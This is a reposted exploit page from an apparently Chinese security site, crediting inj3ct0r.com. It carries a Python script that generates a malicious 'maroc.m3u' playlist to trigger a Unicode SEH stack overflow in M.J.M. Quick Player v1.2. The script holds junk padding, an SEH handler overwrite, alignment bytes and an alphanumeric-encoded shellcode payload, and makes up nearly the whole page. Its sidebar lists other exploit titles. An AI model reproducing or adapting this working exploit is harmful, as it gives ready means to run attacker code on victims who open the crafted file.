M.J.M. Quick Player v1.2 Unicode Stack overflow exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

M.J.M. Quick Player v1.2 Unicode Stack overflow exploit

来源：inj3ct0r.com 作者：Molotov 发布时间：2010-02-10

=======================================================
M.J.M. Quick Player v1.2 Unicode Stack overflow exploit
=======================================================

#!/usr/bin/python
#
#   M.J.M. Quick Player v1.2 Unicode Stack overflow exploit
# by :     Molotov From Privat Team Hackers of Morocco

# Reference: http://inj3ct0r.com/exploits/8217

shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARA"
"LAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZA"
"BABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"
"KLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMX"
"LOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7"
"TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MP"
"KQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4"
"M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4K"
"KT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM"
"2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU"
"7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
"QQ2LRCM0LJA"
)

buffer = "\x41"*536     # junk

buffer+="\x41\x6D"
buffer+="\x41\x4D" # SE Handler (unicode format = 0x004A0059)

buffer+= '\x58\x6d'
buffer+= '\x05\x02\x22\x6d'
buffer+= '\x2d\x12\x22\x6d'
buffer+= '\x50\x6d\xc3'

buffer+='A' * 1495 # some mo' padding to please my eyes
buffer+= shellcode
buffer+= 'A' * (3000-len(shellcode)-1495)

f = open("maroc.m3u", "w")
f.write(buffer)
f.close()

print "[*] File created !"

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告